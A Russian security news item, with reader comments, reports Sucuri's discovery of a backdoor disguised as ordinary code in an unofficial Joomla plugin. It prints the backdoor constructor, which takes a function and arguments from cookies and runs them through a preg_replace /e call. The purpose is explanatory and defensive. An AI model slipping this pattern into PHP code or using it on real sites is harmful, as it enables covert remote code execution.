В плагине Joomla обнаружили бэкдор, замаскированный под легитимный код

image

Теги: бэкдор, Joomla, исследование

По данным экспертов, упустить наличие бреши могут как администраторы, так и решения безопасности.

Как сообщают исследователи безопасности в официальном блоге компании Sucuri, им удалось выявить «интересный бэкдор» в неофициальном плагине для платформы Joomla.

По словам специалистов, все было настолько хорошо продумано, что поначалу они не смогли понять, что имеют дело с бэкдором. Для наглядности эксперты предоставили код упомянутого дополнения:

«На первый взгляд ничего подозрительного. Ничего не зашифровано, не запутано и нет излишних комментариев. Самый обычный код для плагина Joomla, - отмечают в Sucuri. – Однако если вы посмотрите немного внимательней, то заметите, что конструктор класса не так уж и безобиден».

public function __construct() {
$filter = JRequest::getString('p3', Null, 'cookie');
if ($filter) {
$option = $filter(JRequest::getString('p2', Null, 'cookie'));
$auth = $filter(JRequest::getString('p1', Null, 'cookie'));
$option("/123/e",$auth,123);
die();
}
}

Исследователи подчеркивают, что не заметить уязвимость при просмотре кода довольно легко. Более того, упустить ее могут и многие сканеры безопасности, однако надежным методом противостояния подобным угрозам является использование инструментов по контролю целостности кода.

Ознакомиться с отчетом можно здесь.


или введите имя

CAPTCHA
КЭП
25-04-2014 01:56:12
Плагин этот скорее всего был скачен с варезного сайта, которые как известно являются рассадниками всяких бэкдоров и шеллов, в официальном релизе http://extensions.joomla.org/extensions/edition/editor-buttons/24621 нет такого куска кода, в этом может убедиться каждый.
0 |
Alex
25-04-2014 10:42:21
Плагин то какой? Ссылку в студию. И да - в шаблонах тоже встречал бесплатных бэкдорчики.
0 |
Юрий
25-04-2014 12:05:34
Я так понимаю речь идет о плагине InstantSuggest судя по коду, как и написано выше в оригинальном коде с сайта разработчика нет вредоносного кода, так что новость ни о чем, с тем же успехом качайте с любого хакерского сайта расширения и потом говорите что все они содержат бэкдор, хотя официальные источники не содержат такого кода! Бред чистой воды!
0 |
lulz
25-04-2014 12:42:43
нуб, новость о том, что бэкдор очень красиво спрятали и хрен бы ты его нашел с такими аналитическими способностями
0 |
FFFGDKSJ
25-04-2014 14:53:36
Автор убери слово легимитивный, это политическое понятие зачем пихать его в IT Легитимность (от лат. legitimus — согласный с законами, законный, правомерный) — согласие народа с властью, когда он добровольно признаёт за ней право принимать обязательные решения. Чем ниже уровень легитимности, тем чаще власть будет опираться на силовое принуждение. Легитимное действие — это такое действие, которое не оспаривается никем из игроков, которые имеют право и возможности это действие оспорить. Действие перестаёт быть легитимным, когда субъекту действия приходится прилагать специальные усилия, чтобы защитить своё право поступать так, как он поступил[1]. Легитимный, -ая, -ое (спец.). Признаваемый законом, соответствующий закону. || сущ. легитимность, -и, ж. Л. власти. (Словарь Ожегова, Толковый словарь русского языка) Кроме того, легитимность — политико-правовое понятие, означающее положительное отношение жителей страны, больших групп, общественного мнения (в том числе и зарубежного) к действующим в конкретном государстве институтам власти, признание их правомерности.
0 |
По
27-04-2014 11:41:07
Спалили
0 |